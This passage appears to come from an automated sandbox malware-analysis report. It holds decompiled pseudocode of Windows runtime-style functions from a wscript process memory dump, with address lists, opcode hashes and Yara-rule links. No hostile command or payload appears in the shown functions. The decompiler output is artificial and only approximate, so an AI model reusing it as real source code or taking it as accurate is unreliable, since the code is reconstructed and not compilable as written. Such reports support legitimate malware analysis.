								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E059C7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0596ae78
0x0596ae7c
0x0596ae7e
0x0596ae81
0x0596ae86
0x0596ae8d
0x059b2691
0x0596ae93
0x0596ae93
0x0596ae93
0x0596ae98
0x0596ae9d
0x059b26a2
0x059b26b4
0x059b26a4
0x059b26ad
0x059b26ad
0x059b26b9
0x00000000
0x059b26bb
0x00000000
0x059b26bb
0x0596aea3
0x0596aea3
0x0596aea3
0x0596aeaa
0x059b26c0
0x059b26c9
0x059b26c9
0x0596aeb3
0x059b26d4
0x059b26e1
0x00000000
0x00000000
0x059b26e7
0x059b26ee
0x059b26f0
0x059b26f9
0x059b26f9
0x059b2702
0x059b2708
0x059b2708
0x059b270b
0x059b270f
0x059b2711
0x059b2711
0x059b2725
0x059b2725
0x00000000
0x0596aeb9
0x0596aeb9
0x0596aebf
0x0596aebf
0x0596aeb3

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 74dc88ee946588347852ffe0952df1efdaa3a2702f78313dd05a69a972715eb9
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 93210135605680CFFB22DB68CA48B7577EAFF44284F0904A1DD048B2A2E7B4EC40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0597FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0597FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E059576E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0597fd9b
0x0597fda0
0x0597fda1
0x0597fdab
0x0597fdad
0x0597fdb0
0x0597fdb8
0x0597fe0f
0x0597fde6
0x0597fde9
0x0597fdec
0x059bc0c0
0x0597fdfe
0x0597fe06
0x0597fe06
0x059bc0c8
0x0597fe2d
0x0597fe2d
0x00000000
0x0597fe2d
0x059bc0d1
0x059bc0e0
0x059bc0e5
0x059bc0e5
0x059bc0e8
0x00000000
0x059bc0e8
0x0597fdf4
0x00000000
0x00000000
0x0597fdf6
0x0597fdfa
0x0597fe1a
0x0597fe1f
0x0597fe1f
0x0597fdfc
0x00000000
0x0597fdfc
0x0597fdcc
0x0597fdd0
0x0597fe26
0x00000000
0x0597fe26
0x0597fdd8
0x0597fddb
0x0597fddd
0x0597fde0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b163dc247b5307240cb988840e9a9c2f28f37f6f229653a0a6d57692ce1a2457
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 6F218E72604A49DFDB31CF49C640E66F7EAFB94B10F25857EE94A97610D730AD00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0597B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0597B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E05962280(_t12, 0x5a38608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E059800C2(0x5a38608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0597b395
0x0597b3a2
0x0597b3a5
0x0597b3aa
0x0597b3b2
0x0597b3ba
0x0597b3bd
0x0597b3c0
0x0597b3c4
0x0597b3c9
0x059ba3e9
0x059ba3ed
0x059ba3f0
0x059ba3ff
0x059ba403
0x059ba409
0x00000000
0x00000000
0x059ba40b
0x059ba40b
0x059ba40f
0x059ba415
0x059ba423
0x059ba423
0x059ba415
0x0597b3d1
0x0597b3e8
0x0597b3e8
0x0597b3d9

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88100b0b2deb022af8270e548f08001cfa80724ad6993cbb5ba55ecc1a38fa4e
Instruction ID: 6e35896c486ec8b281d744075b5d315bc2eacfa2a047e5a0b7d77f9fac731f87
Opcode Fuzzy Hash: 88100b0b2deb022af8270e548f08001cfa80724ad6993cbb5ba55ecc1a38fa4e
Instruction Fuzzy Hash: A41166333061149BCB28DA148E81E7BB26BFBC5730B28113AED16C7380EE35AC06C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 05949240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05949240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x5a1f708);
				E0599D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E059895D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E059895D0();
				_t33 =  *0x5a384c4; // 0x0
				L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x5a384c4; // 0x0
				L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x5a384c4; // 0x0
				E05962280(L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x5a386b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E059895D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E059895D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E05949325();
					_t50 =  *0x5a384c4; // 0x0
					return E0599D0D1(L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x05949240
0x05949242
0x05949247
0x0594924c
0x0594924e
0x05949255
0x05949257
0x0594925a
0x0594925f
0x0594925f
0x05949266
0x05949271
0x05949276
0x05949279
0x0594927e
0x05949295
0x0594929a
0x059492b1
0x059492b6
0x059492d7
0x059492dc
0x059492e0
0x059492e6
0x059492e8
0x059492ee
0x05949332
0x05949333
0x05949337
0x05949338
0x0594933a
0x0594933a
0x0594933d
0x05949342
0x05949342
0x05949345
0x05949349
0x0594934e
0x05949352
0x05949357
0x059492f4
0x059492f4
0x059492f6
0x059492f9
0x05949300
0x05949306
0x05949324
0x05949324

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03739141ec3db011e1fa903761079452247021807c3f5c298fdf4ce326b043e0
Instruction ID: 5e3a0097db4189c6b0b11945bd105de9a30b631cddcd8732f04d6eb91bda4eff
Opcode Fuzzy Hash: 03739141ec3db011e1fa903761079452247021807c3f5c298fdf4ce326b043e0
Instruction Fuzzy Hash: EE213931251601EFC725EF68CE44F1AB7B9FF48708F144568F14A86AA1CB38EA45DF44

Uniqueness

Uniqueness Score: -1.00%

Function 059D4257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E059D4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x5a208d0);
				E0599D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E059D41E8(__ebx, __edi, __ecx, _t39);
				E0595EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x5a387e4;
					_t18 =  *0x5a387e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x5a35cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x5a387e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x5a387e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L05947055(_t31 + 0xfffffff8);
								_t24 =  *0x5a387e0; // 0x0
								_t18 = _t24 - 1;
								 *0x5a387e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x5a35cd0;
				if( *0x5a35cd0 <= 0) {
					L05947055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x5a387e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x5a387e8 = _t30;
						 *0x5a387e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0599D0D1(L059D4320());
			}

0x059d4257
0x059d4257
0x059d4257
0x059d4259
0x059d425e
0x059d4263
0x059d4265
0x059d4273
0x059d4278
0x059d427c
0x059d427f
0x059d4281
0x059d4287
0x059d42d7
0x059d42d7
0x059d42da
0x059d428d
0x059d428d
0x059d428f
0x059d4292
0x059d4297
0x059d429c
0x059d42a0
0x059d42a6
0x059d42a8
0x059d42ae
0x059d42b3
0x00000000
0x059d42ba
0x059d42ba
0x059d42bf
0x059d42c5
0x059d42ca
0x059d42cf
0x059d42d0
0x00000000
0x059d42d0
0x059d42b3
0x00000000
0x059d42a6
0x059d429c
0x059d42dc
0x059d42dc
0x059d42e3
0x059d4309
0x059d42e5
0x059d42e5
0x059d42e8
0x059d42ee
0x059d42f0
0x00000000
0x059d42f2
0x059d42f2
0x059d42f4
0x059d42f7
0x059d42f9
0x059d4300
0x059d4300
0x059d42f0
0x059d430e
0x059d431f

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3ef7150f8ace4093678721e06993bc859840bccd79501e232d0da691ce868d
Instruction ID: 1492aa0bb5e2de8528c797bb5ca2b6552972bf803a4ef1ae98735efe39d41f94
Opcode Fuzzy Hash: be3ef7150f8ace4093678721e06993bc859840bccd79501e232d0da691ce868d
Instruction Fuzzy Hash: 36217970616702CFCF14DF68D945A28BFE6FB85318B10C26AF2199B250DB75E542CF90

Uniqueness

Uniqueness Score: -1.00%

Function 059C46A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E059C46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0598F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0597D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L059677F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x059c46b7
0x059c46ba
0x059c46c5
0x059c46c8
0x059c46d0
0x059c46d4
0x059c46e6
0x059c46e9
0x059c46f4
0x059c46ff
0x059c4705
0x059c4706
0x059c470c
0x059c4713
0x059c471b
0x059c4723
0x059c4725
0x059c46d6
0x059c46d9
0x059c46db
0x059c46db
0x059c4732

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 88c26323bb81d7c6850cba96f064386ffa46bb41557c6034862e6341c35cf73c
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 5511E572604208BBCB159F5CD8808BEBBB9EFD5344F1080AEF944C7351DA319D55D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 05972397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E05972397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x5a3848c != 0) {
					L0596FAD0(0x5a38610);
					if( *0x5a3848c == 0) {
						E0596FA00(0x5a38610, _t19, _t27, 0x5a38610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E05972581(0x5a38610, 0x59250a0, _t26, _t27, _t28);
						E0596FA00(0x5a38610, 0x59250a0, _t27, 0x5a38610);
					}
				} else {
					L1:
					_t11 =  *0x5a38614; // 0x1
					if(_t11 == 0) {
						_t11 = E05984886(0x5921088, 1, 0x5a38614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E05972581(0x5a38610, (_t11 << 4) + 0x5925070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x059723b0
0x059723b6
0x05972409
0x05972415
0x059b5ae9
0x00000000
0x0597241b
0x0597241b
0x0597241d
0x05972427
0x0597242e
0x05972430
0x05972430
0x059723b8
0x059723b8
0x059723b8
0x059723bf
0x059723fc
0x059723fc
0x059723c1
0x059723c3
0x059723d0
0x059723d8
0x059723d8
0x059723dc
0x059723de
0x059723e1
0x059723e1
0x059723ec

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b52c2784275b44cf91f504ac4cf9caf1b0af2ddaf2edf049927e3751902197a
Instruction ID: a87efae7f6cfdad7c3eb2e1570cd3967f4699771695a2d3a0b9eb00ae068a109
Opcode Fuzzy Hash: 6b52c2784275b44cf91f504ac4cf9caf1b0af2ddaf2edf049927e3751902197a
Instruction Fuzzy Hash: B5118E3675430567DB30AB29AC84F29B7DDFB90B14F148427F6069B280DBB4F8018754

Uniqueness

Uniqueness Score: -1.00%

Function 059837F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E059837F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E05962280(_t6, 0x5a38550);
				}
				_t29 = E0598387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0595FFB0(0x5a38550, _t27, 0x5a38550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x059837fa
0x059837fc
0x05983805
0x05983808
0x05983808
0x05983814
0x05983818
0x05983846
0x05983848
0x0598384b
0x0598384b
0x05983852
0x00000000
0x05983854
0x05983856
0x00000000
0x00000000
0x05983863
0x00000000
0x05983863
0x0598381a
0x0598381a
0x0598381f
0x0598386e
0x0598386e
0x05983871
0x05983873
0x05983873
0x05983868
0x00000000
0x05983868
0x05983821
0x05983826
0x00000000
0x00000000
0x05983828
0x0598382a
0x05983841
0x00000000
0x05983841

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c39ab3d6d003030e317c02503690de43e0c1fe9467beeaf837395055668f66
Instruction ID: 8521fc01bc64bccf9bfb2a44522af408d04dc8b60fd0bcf5ee4e990eb2d6bf22
Opcode Fuzzy Hash: e5c39ab3d6d003030e317c02503690de43e0c1fe9467beeaf837395055668f66
Instruction Fuzzy Hash: 5801D6B2A066109BC737EB19DD44E36BBBBEFC5F607158869F8468B211DB38D801C780

Uniqueness

Uniqueness Score: -1.00%

Function 0594C962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0594C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x5a3d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0595EEF0(0x5a370a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E059CF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0595EB70(_t29, 0x5a370a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0598B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E059CF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x5a370c0; // 0x0
					while(_t38 != 0x5a370c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x5a3b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0594c96a
0x0594c974
0x0594c988
0x0594c98a
0x059b7c9d
0x059b7c9f
0x059b7ca4
0x059b7cae
0x059b7cf0
0x059b7cf5
0x059b7cfa
0x0594c992
0x0594c996
0x0594c997
0x0594c998
0x0594c9a3
0x0594c9a3
0x059b7cb0
0x059b7cb7
0x059b7cbb
0x00000000
0x00000000
0x059b7cbd
0x059b7ce8
0x059b7cc5
0x059b7cc8
0x059b7cca
0x059b7cd0
0x059b7cd6
0x059b7cde
0x059b7ce4
0x059b7ce4
0x059b7cd0
0x00000000
0x059b7ce8
0x0594c990
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e83a29b49eff8ddedd94bbac6560755a532342f02ca8397995d80b15e7d2cd
Instruction ID: 6daaf105b5597c772f66216e246245385c32fd5365c5cf178df56ea958968396
Opcode Fuzzy Hash: 80e83a29b49eff8ddedd94bbac6560755a532342f02ca8397995d80b15e7d2cd
Instruction Fuzzy Hash: 2A11A03131460A9BE750AF68CE8AA6A7BAAFBC5614B00066CF84197650DB60BD15C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0597002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0597002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E05967D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E05967D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E05967D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E05967D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x05970032
0x05970037
0x05970043
0x059b4b3a
0x05970049
0x05970049
0x05970049
0x0597004e
0x05970053
0x059b4b48
0x059b4b5a
0x059b4b4a
0x059b4b53
0x059b4b53
0x059b4b5f
0x00000000
0x059b4b61
0x00000000
0x059b4b61
0x05970059
0x05970059
0x05970060
0x059b4b6f
0x059b4b6f
0x05970069
0x059b4b83
0x00000000
0x00000000
0x059b4b90
0x059b4b9b
0x059b4b9b
0x059b4ba4
0x00000000
0x00000000
0x059b4baa
0x00000000
0x0597006f
0x0597006f
0x00000000
0x0597006f
0x05970069

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

